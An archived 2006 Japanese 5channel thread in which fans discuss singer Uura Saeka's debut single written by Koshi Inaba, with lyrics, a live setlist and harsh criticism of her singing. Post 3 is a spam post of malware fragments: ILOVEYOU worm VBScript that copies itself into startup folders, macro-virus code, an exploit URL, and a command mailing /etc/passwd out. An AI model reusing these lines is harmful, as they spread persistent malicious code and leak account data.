5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

宇浦冴香 【作詞&作曲:稲葉浩志】

1 :名無しの歌姫:2006/09/29(金) 12:27:36 ID:Z+kkzXAE
「Sha la la -アヤカシNIGHT-」で今秋デビュー予定

作詞&作曲:稲葉浩志
編曲:葉山たけし

http://uurasaeka.com/
http://uurasaeka.jp/

2 :名無しの歌姫:2006/09/29(金) 13:29:24 ID:+Qs65AS2
余裕の2ゲト

3 :名無しの歌姫:2006/09/29(金) 17:49:36 ID:ouk1TztI
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

4 :名無しの歌姫:2006/09/30(土) 14:51:59 ID:ISwYNds9
なぜ韓国人男性は日本人女性にモテるのか  米紙「韓国の男性は“アジアのイタリア人”」
http://japanese.chosun.com/site/data/img_dir/2006/09/05/200609050000111insert_1.jpg
「日本人女性の財布の中身はソウルにつぎ込まれている!」

米国のシカゴ・トリビューン紙がアジアの韓流ブーム現象を特集し、注目を浴びている。
同紙インターネット版は4日(韓国時間)、「日本の女性たちはソウルの男性とお付き合い
するために血眼になっている」という見出しの記事を掲載した。
これは韓流ブームについての記事だ。

 天井知らずの人気を誇る韓流スターたちの出演料も詳しく紹介している。
同紙は「韓国の人気男優たちはハリウッドを除けば最高の待遇で迎えられる俳優になった。
ドラマ『冬のソナタ』のペ・ヨンジュンは現在、映画1本当たり500万ドル(約5億8300万円)の
ギャラが設定されている。また、彼は各種事業を展開し、その資産は1億ドル(約116億円)近い。
その他、チャン・ドンゴンやリュ・シウォンなどの韓流スター9人も年間1000万ドル
(約11億6000万円)以上を稼ぎ出している」と報じた。そして「こうした韓流ブームのおかげで、
韓国の観光産業は右肩上がりで、韓流スター関連グッズも飛ぶように売れている」と付け加えた。
特に、この現象は日本だけでなく中国や、ベトナムなど東南アジアにも広がっている、と分析している。

 また、「韓国の男性は“アジアのイタリア人”と呼ばれている」とも報じている。
「健康な体と2年間の徴兵義務で、韓国の若い男性はアジアで最も心身共に
よく鍛えられていると言われ、こうしたあだ名がついた」という。

 同紙は、「そのため韓国の男性は日本で一番憧れの男性像になった」と強調する。
お見合いのためにこれまでに韓国を10回も訪れたという日本人女性ヨシムラさんとの
インタビューも掲載された。彼女は「韓国の男性は甘くてロマンチック。
“愛している”の一言も口にできない日本人男性とは違う」として、
理想の韓国人男性探しを続けるという夢を語ったという。

 ついに韓流ブームは、全世界が注目する文化現象として定着したようだ。

キム・ソンウォン記者 『スポーツ朝鮮』
http://japanese.chosun.com/site/data/html_dir/2006/09/05/20060905000011.html

5 :名無しの歌姫:2006/09/30(土) 14:52:16 ID:NnR/B7AM
>>1

宇浦のスレは、まだ早すぎないか?


6 :CHESTER ◆ZBmNr7DRH6 :2006/09/30(土) 15:04:34 ID:hBmDxi6a
上木の時買ったから今回も買うんだろうなあ…

7 :名無しの歌姫:2006/09/30(土) 21:22:03 ID:yyNf6GrT
画像うp汁

8 :名無しの歌姫:2006/10/01(日) 11:14:31 ID:3w99W6Kl
age

9 :名無しの歌姫:2006/10/02(月) 12:09:36 ID:DCjO2zD1
age

10 :名無しの歌姫:2006/10/02(月) 17:26:04 ID:JeyH2L8G
死ねじ10

11 :名無しの歌姫:2006/10/02(月) 20:48:40 ID:iHIP7d1k
稲葉さんを安売りするな馬鹿GIZA

12 :名無しの歌姫:2006/10/03(火) 15:21:52 ID:UwxMkA6x
>>11
プッ

保守


13 :名無しの歌姫:2006/10/03(火) 21:23:15 ID:4xLGu9tI
「Sha la la -アヤカシNIGHT-」
潤んだ瞳で僕を覗き込む その仕草に心を奪われそうだよ
ほんのちょっと肌に触れる 些細な事で恋は始まるんだね

渇きはじめた僕の心を 君のしずくでうるおしてくれないかい

Sha la la ざわめく Sha la la この気持ち
抑えられないこの欲情
Sha la la いつまでも Sha la la 続いてく
今始まる 二人だけのアヤカシNIGNT

Sha la la ざわめく Sha la la この気持ち
厚い結界もブチ抜いてく
Sha la la 永遠に Sha la la 続いていく
今始まる 二人きりのアヤカシNIGNT

14 :名無しの歌姫:2006/10/03(火) 21:55:05 ID:dlyuAp2F
>>13 これホントの歌詞??

15 :名無しの歌姫:2006/10/03(火) 22:16:12 ID:OI5J64Qe
ホント

16 :名無しの歌姫:2006/10/03(火) 23:09:14 ID:iRpTsk2S
画像欲しい?

17 :名無しの歌姫:2006/10/03(火) 23:42:24 ID:UwxMkA6x
>>16
どちらかと言うと画像よりパンライブの映像が欲しい


18 :名無しの歌姫:2006/10/04(水) 19:13:06 ID:LVLsgVWW
age

19 :名無しの歌姫:2006/10/05(木) 11:57:32 ID:ldzPX3Cx
age

20 :名無しの歌姫:2006/10/05(木) 18:25:21 ID:SOdOvc2y
大賀20

21 :名無しの歌姫:2006/10/05(木) 19:04:13 ID:SOdOvc2y
リーブ21

22 :名無しの歌姫:2006/10/06(金) 12:22:45 ID:a7br3Ae/
保守

23 :名無しの歌姫:2006/10/06(金) 13:12:28 ID:5pJ6DN+T
マイケルジョーダン23

24 :名無しの歌姫:2006/10/06(金) 14:25:32 ID:3e/eSp1o
宇浦冴香の曲を手掛けて欲しいといえば・・・
作詞・・・
まこと(シャ乱Q)、牧穂エミ、亜蘭知子、上原あずみ、三枝夕夏、川島だりあ
作曲・・・
小澤正澄(元PAMELAH)、高山征輝(元ZYYG)、後藤康二(元ZYYG)柴崎浩(元WANDS)、はたけ(シャ乱Q)、 宇徳敬子、
五十嵐美貴(SHOW-YA)、仙波さとみ(SHOW-YA)
編曲・・・
明石昌夫、小澤正澄、平田祥一郎、鈴木Daichi秀行


25 :名無しの歌姫:2006/10/06(金) 15:25:03 ID:5pJ6DN+T
三枝なんてカワイソスw

26 :名無しの歌姫:2006/10/06(金) 17:04:38 ID:zI3htmUU
作詞=三枝夕夏だけは何があっても嫌。

27 :名無しの歌姫:2006/10/06(金) 21:21:48 ID:AgETPlE1
三糞作詞だけは死んでも嫌

28 :名無しの歌姫:2006/10/06(金) 22:03:46 ID:5wNBhEeE
>>24
センス無さすぎ。鼓膜破って一生寝とれ。

29 :名無しの歌姫:2006/10/07(土) 11:26:37 ID:zGts9d5T
>>28
センスのないオマエガナー
>>24
さすが2ちゃんねるの神様だ
やってる人が多いし、大ブームだし。

30 :名無しの歌姫:2006/10/08(日) 11:56:19 ID:f4bAzjFU
稲葉浩志、大学1年生の時のバンドの練習音源
http://page8.auctions.yahoo.co.jp/jp/auction/h40758896

31 :名無しの歌姫:2006/10/08(日) 15:32:02 ID:2Y4fxTEo
>>13はマジ?
B'zスレに貼ってえらいめにあったんだが

32 :名無しの歌姫:2006/10/08(日) 19:12:56 ID:Z2CvPO38
ネタだろが

33 :名無しの歌姫:2006/10/08(日) 21:49:07 ID:sFdZBLbh
ガチと信じたい・・・

34 :名無しの歌姫:2006/10/10(火) 14:30:48 ID:neUv2voc
34師匠

35 :名無しの歌姫:2006/10/11(水) 02:30:50 ID:y5LGJP56
>>31
ネタ

2曲とも稲葉さんが『決界師』のために作詞作曲!
OPを歌う新人の宇浦冴香さんは、なんと現役女子高校生。
その歌声も必聴もの!!

36 :名無しの歌姫:2006/10/11(水) 11:25:08 ID:2qV+aoGk
北空未羽にううらちゃんの曲を手がけてもらいたい

北空の2ndけっこう良かったんだけど、何がいいかって歌よりも何より曲が良くて
もっと売れそうなアーが歌えばいいのにってちょっと思った

37 :名無しの歌姫:2006/10/11(水) 12:50:14 ID:iH7QS1Yk
統一より転載

sha la la アヤカシNIGHT

sha la la la…
やばい森にさそわれ 今宵もShowtime(アヤカシNIGHT)
力任せに 誰もが暴れ放題(ヨフカシでFIGHT)
ためらいなんて吹き飛ばして
立ち向かえるかい?Yeah
キミを守る        (どうなってもいい)
キミを守る それだけで(それだけでいい)
涙を流すだけの毎日にバイバイ
Sha la la la…
届けたい言葉なら胸の中にある(ナイショのロマンス)
消えてほしくない人なら目の前にいる(フシギなディスタンス)
誰かが傷つくのばかり
もう見ちゃいられない Yeah
I wanna be your knight(強くなりたい)
I wanna be your light いまより(いまよりもっと)
いつかキミとかわそう 100%のスマイル

38 :名無しの歌姫:2006/10/13(金) 16:20:59 ID:p08dmt1k
日テレでktkr

39 :名無しの歌姫:2006/10/16(月) 10:09:49 ID:lOJyJJB+
よみうりテレビ・日本テレビ系全国ネットテレビアニメ「結界師」
(毎週月曜19:00〜19:30 <初回放送10/16のみ 60分特別版>)



40 :名無しの歌姫:2006/10/16(月) 18:59:06 ID:7/UrMsR6
age

41 :名無しの歌姫:2006/10/16(月) 19:00:07 ID:L2Jj5BGD
ううらタソキタ━━━━━━(゚∀゚)━━━━━━!!!!!




42 :名無しの歌姫:2006/10/16(月) 19:08:10 ID:Ri7WBM1T
とうとうこの日がo(T□T)o

43 :名無しの歌姫:2006/10/16(月) 19:14:51 ID:q+2grJqR
ボイトレしろよヘタクソ。
素人以下だし稲葉を汚すなボケ
マジで消えろ

44 :名無しの歌姫:2006/10/16(月) 19:27:59 ID:FMyO6Hd0
>>43
それ以前に曲が糞
稲葉は、作曲の才能ないなw


45 :名無しの歌姫:2006/10/16(月) 19:28:43 ID:xxtoLFjq
ううらは別にヘタクソって程ヘタクソでも無いと思うが
曲が悪い気がする。。十数年前の路線?というか。

46 :名無しの歌姫:2006/10/16(月) 19:38:30 ID:i/NmM5wx
高橋ひろの遺作を歌って欲しい

47 :名無しの歌姫:2006/10/16(月) 19:50:24 ID:L2ebNR1w
稲葉・・・TAKに任せとけば

48 :名無しの歌姫:2006/10/16(月) 19:52:57 ID:j8fLOGGo
胸毛ヲタ出張してくるなw

49 :名無しの歌姫:2006/10/16(月) 20:42:09 ID:L2ebNR1w
早く発売日きまんねーかな

50 :名無しの歌姫:2006/10/16(月) 20:43:40 ID:7Kp3YDeA
稲葉の曲は稲葉以外歌わない方がいいということがよく分かった
提供するボーカリストに合った曲を作る能力がまだ稲葉にはないんだよ
ま、これでOK出しちゃうプロデューサー(長戸?)が一番問題有りなわけだが

51 :名無しの歌姫:2006/10/16(月) 21:07:57 ID:UJUZITAR
ウウライラネ

52 :名無しの歌姫:2006/10/16(月) 23:16:21 ID:XqQeizJw
ちょっと宇浦気の毒に思えてきた。
Sha la la、メロの作りが難しくて、稲葉じゃないと歌いこなせないだろ。
ミックスの仕方も悪い。
せめて稲葉がコーラスいれないでやりゃ良かった気がする。
宇浦、下手じゃないんだろうが、抑揚のつけ方が一本調子で曲に馴染んでないし、
稲葉が上手いせいで下手に聞こえる。

これがデビュー曲になるのは可哀想っちゃ可哀想だな。
てか、そもそも何で稲葉に楽曲提供依頼したんだよ、スタッフ。
稲葉の曲は稲葉にしか歌えない。

53 :名無しの歌姫:2006/10/17(火) 00:08:06 ID:tV8e6p53
過小評価しすぎw
普通に上手いって

54 :名無しの歌姫:2006/10/17(火) 00:15:37 ID:sFlmS9KD
確かに曲もミックスも悪いが全然抑揚はないよ(ちなみにライブのときもなかった)
デビュー早すぎじゃね?


55 :名無しの歌姫:2006/10/17(火) 00:19:46 ID:lAB1Xkjl
411 名前:名無しさん@お腹いっぱい。 [sage 稲葉] 投稿日:2006/10/16(月) 23:59:46 ID:KzCybCV+0    New!!
ttp://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000161433.wmv

56 :名無しの歌姫:2006/10/17(火) 02:00:46 ID:Rr1edEVU
>>46
書き込むな、お前。

57 :名無しの歌姫:2006/10/17(火) 06:29:59 ID:USW+DntX
上原あずみ並にデビューは早すぎだな。

もっとボイトレ&ビジュアルをなんとかしろ。

58 :名無しの歌姫:2006/10/17(火) 08:56:00 ID:GnoBYoDM
>>46ですが、うそです。ごめんなさい。

59 :名無しの歌姫:2006/10/17(火) 09:38:58 ID:SO+GgMfY
宇浦タソカワイイじゃん!

60 :名無しの歌姫:2006/10/17(火) 11:30:13 ID:ccBmv0ze
>>46
稲葉浩志と高橋ひろが同じ年齢だからね

61 :名無しの歌姫:2006/10/17(火) 12:49:57 ID:SZs0Jlyd
B'zファンの冷静な感想

■[稲葉浩志]Sha la la -アヤカシNIGHT- 19:16
うーん、新人の女性シンガーに歌わせる曲じゃない気がするなぁ。
稲葉さんのノリの良い曲っていわゆるJ-POPらしいノリの良さから外れてるから、
本人が歌う分には十分様になるんだけど、
他の人が歌うと「普通じゃない」感じだけが際立って
色物っぽい曲になってしまうんだなぁ、と実感。
だから、コーラスの部分はとても様になってる。
同じカバーならピエロの方がこれは良かったかな。


62 :名無しの歌姫:2006/10/17(火) 14:47:04 ID:i4XKO46K
>>48

63 :名無しの歌姫:2006/10/18(水) 20:41:04 ID:9a8gxzUl
「B'zファンの冷静な感想」って自分で言ってるよw

64 :名無しの歌姫:2006/10/18(水) 20:43:21 ID:0MygVEOV
鳴かず飛ばずで終わる残念な人なんだから、そっとしといてあげよう。


65 :名無しの歌姫:2006/10/18(水) 20:56:11 ID:xC396xfb
UURA NIGHTTHURSDAY LIVE at hills パン工場
[Performer] 宇浦冴香
[Guest] 星田紫帆

発売日 : 発売日 : 2006/10/26
ライブ実施日 : ライブ実施日 : 2006/11/23

66 : ◆afXmA5fF92 :2006/10/18(水) 21:20:11 ID:YbxNVH/G
しめじ66

67 :名無しの歌姫:2006/10/18(水) 21:27:53 ID:c+3srqvY
http://www.youtube.com/watch?v=4wIioQCsbgA

68 :名無しの歌姫:2006/10/19(木) 13:24:42 ID:dhRlGQap
宇浦さん期待

69 :名無しの歌姫:2006/10/21(土) 16:28:45 ID:OQ65sAty
つべ削除されてるじゃん!
月曜までおあずけか

70 :名無しの歌姫:2006/10/21(土) 17:45:36 ID:/o3Xvf1J
曲自体は、アニメに凄い合ってると思う。

けど、稲葉さんの歌が上手すぎて、
宇浦にはその後の責任が取れてないって感じww

稲葉さんが歌えばいいのに。

この曲、稲葉さん以外が歌うには難しすぎでしょ。

71 :CHESTER ◆ZBmNr7DRH6 :2006/10/21(土) 19:33:01 ID:GGK643jj
そうだね稲葉さんはスゴいね

72 :名無しの歌姫:2006/10/22(日) 01:19:47 ID:RveflNtP
>>70
普通に宇浦に合ってると思う

73 :名無しの歌姫:2006/10/22(日) 16:02:33 ID:k83+U8yN
稲葉さんは普通に次のアルバムでセルフカバーするだろう

74 :名無しの歌姫:2006/10/22(日) 16:50:07 ID:OdDUWdFu
11月23日、宇浦冴香UURA NIGHTktkr!


75 :CHESTER ◆ZBmNr7DRH6 :2006/10/22(日) 16:56:16 ID:J+S2h6lK
ううら いいにくっw

76 :名無しの歌姫:2006/10/22(日) 17:07:55 ID:OdDUWdFu
12月頭ぐらいに、「Sha la la -アヤカシNIGHT-」出るかな?


77 :名無しの歌姫:2006/10/22(日) 20:26:40 ID:bWKGOeaO
>>73
すぐソロ活動に入らない限りそれはない。

稲葉はアルバムには同じ時期に作った曲しか入れない主義だと。

シングル3枚、アルバム3枚出てるがアルバムに入ったシングルは1枚のみ。

78 :名無しの歌姫:2006/10/22(日) 23:35:22 ID:gRqqeg9b
>>77
人の気持ちなんて変わるよ
シングルは絶対入れないとか言われてたけど収録したように

79 :名無しの歌姫:2006/10/23(月) 00:42:47 ID:pTeqk84Q
>>78
そんな発言本人から聞いたことないけどいつの話?

80 :名無しの歌姫:2006/10/23(月) 02:14:25 ID:vuTGSMLG
>>77
そんな発言本人から聞いたことないけどいつの話?

81 :名無しの歌姫:2006/10/23(月) 07:52:06 ID:kOWkuMf/
>>80
B'zでね。
会報か雑誌か忘れたけどそう言ってた。

>>78
シングルは入れないなんて聞いたことないなぁ。
ハピバを出す気はないと言ってアルバムに入れたことはあったけど。

82 :名無しの歌姫:2006/10/23(月) 18:44:38 ID:NR95bAPA
今日は決壊死wktk

83 :名無しの歌姫:2006/10/23(月) 20:01:40 ID:kodJ0ZcQ
シャララいーじゃねーかよっ
稲葉に全部歌ってほしいぜっ

84 :名無しの歌姫:2006/10/24(火) 05:11:22 ID:4LuwLOCn
なんか、このアニメつまらない(絵が変)。歌もよくない。
ブラックジャックや犬夜叉のがよかった。
なんか最近の新しいアニメって、オタクが作ってるって感じがする。
よく、クラスに、ノートにアニメの絵とか書いてる変な人いるじゃん。
そういう人が作ってるって感じ。なんか絵が変なんだよな…。
昔のアニメを再放送してほしい。

85 :名無しの歌姫:2006/10/24(火) 07:54:38 ID:QVEHgvE8
上木の方がまだマシ

86 :名無しの歌姫:2006/10/24(火) 14:42:38 ID:L1HqqZpQ
同意

87 :名無しの歌姫:2006/10/24(火) 20:20:22 ID:/SNplAPF
宇浦タソおはよう(*´д`*)

88 : ◆b3AFo7G5Yc :2006/10/24(火) 20:27:23 ID:0a504lXA
しめじ88

89 :名無しの歌姫:2006/10/25(水) 01:42:39 ID:W06gpfEf
アンチのいなくなった上木

90 :名無しの歌姫:2006/10/25(水) 01:58:05 ID:2/Qgf+Lm
アンチ上木は三糞ヲタだろ
ゴリ押しが危機に晒されたから
相変わらず三糞のゴリ押しは続くから、ヲタも安心して叩かなくなったってこと

91 :名無しの歌姫:2006/10/25(水) 04:45:57 ID:z9GeYxxa
正直、曲はいいけどボーカルが・・・


92 :名無しの歌姫:2006/10/25(水) 15:18:23 ID:W0uCq5Od
宇浦タソただいま(*´д`*)




93 :名無しの歌姫:2006/10/29(日) 04:39:26 ID:fHLT1Uqp
保守

94 :名無しの歌姫:2006/10/30(月) 19:01:42 ID:gbgETYft
またまた保守

95 :名無しの歌姫:2006/10/31(火) 17:15:40 ID:kd/JGXRz
もっとも保守

96 :名無しの歌姫:2006/11/01(水) 00:01:17 ID:wogFg+MO
official見れない


97 :名無しの歌姫:2006/11/01(水) 00:19:59 ID:5loqv9GW
まだオフィシャルはない。1はテキトー。

98 :名無しの歌姫:2006/11/01(水) 22:02:43 ID:ahyCsNH/
ちょwテキトーなのかよ!

99 : ◆Y1Y/LV.OVs :2006/11/02(木) 10:59:31 ID:HPs5zwGd
しめじ99

100 : ◆Y1Y/LV.OVs :2006/11/02(木) 11:00:06 ID:HPs5zwGd
しめじ100

101 :名無しの歌姫:2006/11/03(金) 11:33:01 ID:rT4ilbZZ
「Sha la la -アヤカシNIGHT-」…聞いたけど、、かなり微妙ですね。
稲葉が歌った方がよかったのに…。確かに、B'zの曲はB'z以外の人が歌うと微妙になるね。
ピエロは、メロディーも普通ぽかったからよかったけど。
でも「Sha la la -アヤカシNIGHT-」は…。ま、アニメじたいも微妙だからべつにいいけど。
犬夜叉またやってほしい。あれは絵も綺麗だったし。


102 :名無しの歌姫:2006/11/03(金) 13:10:53 ID:Iv466jvA
lkhl

103 :名無しの歌姫:2006/11/03(金) 17:26:41 ID:Lusireig
本人否定も肯定もしないけど結局この疑惑どうなの?w
http://music5.2ch.net/test/read.cgi/musicj/1162541711/

104 :名無しの歌姫:2006/11/04(土) 17:58:10 ID:Qi/Tmj63
ついに稲葉の後継者が誕生したな

105 :名無しの歌姫:2006/11/04(土) 21:12:09 ID:PgSuOlO3
カップリングは
作詞:三浦徳子
作曲:小澤正澄
編曲:葉山たけし
でやってほしい


106 :名無しの歌姫:2006/11/05(日) 11:38:31 ID:wnWERPTi
http://www.youtube.com/watch?v=iMX0IaYP23o

107 :名無しの歌姫:2006/11/07(火) 16:17:03 ID:Nzgyq3xs
なんか情報ないのか?

108 :名無しの歌姫:2006/11/07(火) 22:30:47 ID:TXjs3reM
引退

109 :名無しの歌姫:2006/11/08(水) 13:29:09 ID:a9aPKZes
オリジナルって、何曲くらいできてるのかねぇ

110 :名無しの歌姫:2006/11/09(木) 00:06:11 ID:SzWnFuTr
パン工場のサイトで写真アリのアーティストプロフ見れるのは既出?
ttp://www.giza-thursdaylive.com/

111 : ◆ADrhmfgWbc :2006/11/09(木) 09:33:54 ID:7AKGeqA5
しめじ111

112 :名無しの歌姫:2006/11/09(木) 17:21:51 ID:wpjYCl6m
宇浦冴香ってどんな人?可愛いの?
てか、今週のアニメちゃんと見てたら、まあ面白かったし、歌もやっと慣れてきた。
慣れてきたらべつに変な歌と思わないようになった。。
でも、あの男の主人公は、、何回見ても慣れない。なんか絵がキモイんだけど。。
また犬夜叉かブラックジャックやってほしい。

113 :名無しの歌姫:2006/11/09(木) 17:59:47 ID:bKslCIkX
>>112宇浦タソはスレンダーでかわいいぞ!

114 :名無しの歌姫:2006/11/09(木) 18:39:15 ID:Wc3VFFvl
>>107
年内GIZAデビュー

115 :名無しの歌姫:2006/11/10(金) 01:53:48 ID:PT9y5NY1
年内ならもう情報出てないとおかしいじゃん?
元旦リリースの愛内がとっくに告知されてるし

116 :名無しの歌姫:2006/11/10(金) 09:51:27 ID:r+ldiToE
>>112
私は何回聞いても慣れない。子供も変だといってた。
稲葉さんが歌った方が良かったのに。まだ、稲葉さんのコーラスが入ってる
だけ救われてるって感じ。それか松本さんに作曲してもらえばよかったのに。
なんか稲葉さんの作曲は、サビがおしい…。

117 :名無しの歌姫:2006/11/10(金) 10:57:54 ID:EV00ScL3
胸毛婆ハウス!

118 :名無しの歌姫:2006/11/10(金) 12:28:24 ID:r+ldiToE
>>117
は?
>>113
画像ないの?てか、GIZAの女性歌手ってみんな雰囲気似てる。なんかルックスだけ
って感じがする…。見た目もみんなザードっぽい。なんであまりテレビ出ないんだろ。

119 :名無しの歌姫:2006/11/10(金) 12:36:27 ID:ga5jjS+5
>>118
>>110のサイトから見れるよ。

120 :名無しの歌姫:2006/11/11(土) 06:21:39 ID:vP7LUDBC
この子、元某ダンスユニット四人組の
再デビューでしょ


121 :名無しの歌姫:2006/11/11(土) 16:36:36 ID:7h3N4f2U
>>120
kwsk

122 :名無しの歌姫:2006/11/12(日) 13:57:11 ID:1GzBza7p
★テレビ出演情報
■11/13(月) 19:00〜19:30 NTV「アニメ結界師」にて
 宇浦冴香メジャーデビュー告知(30秒) 


123 : ◆PUW1SmJv56 :2006/11/12(日) 21:24:22 ID:07jLCfiJ
しめじ123

124 :名無しの歌姫:2006/11/13(月) 01:53:59 ID:whwFDeRN
>>122
それどこから?

125 :名無しの歌姫:2006/11/14(火) 16:16:48 ID:cNkQlUp9
いつデビューすんのよ?

126 :名無しの歌姫:2006/11/15(水) 04:40:47 ID:1IwZrclj
>>121声をよくきけば分かる人いると思う

127 :名無しの歌姫:2006/11/16(木) 13:32:07 ID:z9gpY/Vv
宇浦は上木を超えた!

128 :CHESTER ◆XxBudfzYis :2006/11/18(土) 01:53:16 ID:VrLPCBfZ
上木ヲタがムカツクからううらに期待

129 :名無しの歌姫:2006/11/21(火) 15:06:58 ID:qEum8fsi
CDでる気配ないな

130 :名無しの歌姫:2006/11/21(火) 19:14:46 ID:mV6nL9wN
UURA NIGHT 期待age

131 :名無しの歌姫:2006/11/21(火) 19:19:36 ID:o42J1Man
宇浦冴香 デビュー決定
12/27発売「Tears〜涙は見せたくない」
タイアップ:
テレビ東京系「JAPAN COIUNTDOWN」12月度オープニング・テーマ(12/2〜)

B'z稲葉浩志提供楽曲
「Sha la la -アヤカシNIGHT-」 2ndシングルとして1月リリース決定
同時発売 稲葉浩志「赤い糸」カップリングに稲葉ver収録

まさに上木彩矢と全く同じ売り方
・デビュー曲が深夜音楽番組オープニング
・何故か、2ndで売り出そうとする。
・2ndにB'zが関わる。
・カバー。 上木の場合は上木がカバー、宇浦の場合は稲葉がカバー

132 :名無しの歌姫:2006/11/21(火) 21:49:04 ID:0/EppB3C
どう考えても上木>>>>>>>>>>>>>>>宇浦

133 :名無しの歌姫:2006/11/21(火) 22:04:52 ID:vi4fSn68
つ12/27発売てなめてんの?
せめて年明けにすりゃいいのに。
こんな時期デビューする奴いねーだろ。


134 :名無しの歌姫:2006/11/22(水) 00:17:15 ID:1PyMB+gh
ウーラキバカってスゴい名前だね。
こりゃブレイク必死!

135 :CHESTER ◆XxBudfzYis :2006/11/22(水) 14:40:01 ID:SMJoXL2e
再盤で10万×10枚売ったB'z様のおこぼれにあやかりまくった上木も大失敗に終わり、さあ今回はどうか…

136 :名無しの歌姫:2006/11/23(木) 01:47:01 ID:BMtYfzf1
http://www.giza.co.jp/index/info/uura.html

137 :名無しの歌姫:2006/11/23(木) 10:04:01 ID:ohqDH26E
期待だよ

138 :名無しの歌姫:2006/11/23(木) 16:32:35 ID:LuuVYOnJ
>>104
それほどの人でもないじゃん。なんか宇浦はべつに歌上手いとは思わない。
でも、三枝とかに比べればマシ。てか、上木ってここでは嫌われてるの?
なんで?

139 :名無しの歌姫:2006/11/23(木) 16:36:09 ID:LuuVYOnJ
Sha la la -アヤカシNIGHT-は、稲葉のコーラスがなきゃ駄目だろな。
メロディーじたいは微妙だし。あれが、コーラスも宇浦だったら変になる。

140 :名無しの歌姫:2006/11/23(木) 18:54:29 ID:dZek4Fm8
しかし稲葉が歌うとカッコ良く聞こえてしまうんだろうな。

141 :名無しの歌姫:2006/11/23(木) 20:01:39 ID:t3Z9r16X
パンライブ あげ

142 :名無しの歌姫:2006/11/23(木) 21:01:22 ID:dp6OZfrw
さっきピエロ歌ってたけど
あれは上木に失礼w

143 :名無しの歌姫:2006/11/23(木) 23:25:16 ID:6gYWHUbx
セトリまだ〜?



144 :名無しの歌姫:2006/11/24(金) 00:11:46 ID:0Wwn7F6E
オーラ皆無だよね、この人
またGIZAのお荷物が増えた

145 :名無しの歌姫:2006/11/24(金) 00:15:45 ID:/TGe+vyt
会場では、けっこう評判良かったような気が、しなくもない。

146 :名無しの歌姫:2006/11/24(金) 00:17:05 ID:TyKk1cDO
会場にいくくらいだもんね
そりゃそうだ


147 :名無しの歌姫:2006/11/24(金) 00:18:49 ID:O/1XOWEP
>>138
一部の人が騒いでるだけだと思う。露出が多いから仕方ないよ。

148 :名無しの歌姫:2006/11/24(金) 00:39:26 ID:h/ePyvkq
>105
死ねばよいのに

149 :名無しの歌姫:2006/11/24(金) 12:17:29 ID:djO68kE6
27日デビューってのは激戦週を避けるためか。
今年はB'z提供で来年は稲葉と松本で分けるのかな。

150 :名無しの歌姫:2006/11/24(金) 12:40:04 ID:KaOmARRR
>>143
B'zスレより

529 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2006/11/24(金) 10:39:16 ID:PXoJ1Eqf0
宇裏ナイト セットリスト
●宇浦冴香 前半
1・Baby, It's You(シレルズたぶん)
2・Heartbreaker(パット・ベネター)
3・Everywhere(ミシェル・ブランチ)
4・There will be love there(ブリリアント・グリーン)
5・Sha la la ―アヤカシNIGHT―(オリジナル曲)
6・ピエロ(上木彩矢版)

●星田紫帆
1・サイレン
2・シングアソング
3・まなざし
4・心ノママ
5・爪痕
6・TRAGIC LOVE

●宇浦冴香 後半
7・I believe(絢香)
8・冷たい花 (ブリリアント・グリーン)
9・フレンズ (レベッカ)
10・Money
11・Proud Mary
12・Highway Star(ディープ・パープル)

●アンコール
1・ロコモーション(リトル・エヴァ)

151 :名無しの歌姫:2006/11/24(金) 17:16:53 ID:glvGN0PT
GIZAの人ってなんであんまりテレビでないんだろ。
B’zも、ヘイ!×3やうたばんに出たことはあるけど、いっつも「B’zと
中継が繋がっていま〜す」って、スタジオには出ないし。なんか、特別扱い?
 あと、GIZAはルックス重視?B’zとはいいけど、カラオケ聞いてるみたい
って思う名前も知られてないようなアーティスト結構いるよね。
小松美保やZARDやB’zはいいけど。

152 :名無しの歌姫:2006/11/24(金) 17:18:57 ID:AjqmKTxB
セトリ乙
ピエロは歌ってほしくなかったかな
B'z上木兼ヲタとしては

153 :名無しの歌姫:2006/11/24(金) 22:18:50 ID:TyKk1cDO
流せるとこに流してくれ


154 :名無しの歌姫:2006/11/24(金) 23:45:30 ID:LzmhBdIg
セトリさんくす。
絢香歌ったのかよ。アイビリーマンセーなんで是非聴きたかった。
てかフレッツで見れるのに完全に忘れてたorz

155 :名無しの歌姫:2006/11/25(土) 03:10:48 ID:vTX3iFom
>>150
他のアーティストの曲歌いまくってるけど、許可取ってんの?

156 :名無しの歌姫:2006/11/25(土) 11:00:32 ID:XrK2fI5H
何を今さら…

157 :名無しの歌姫:2006/11/25(土) 22:41:25 ID:vHRBG+cB
こいつGIZAオタにも一般にも受けなさそう
CD2枚だしていつのまにか消えてると思う

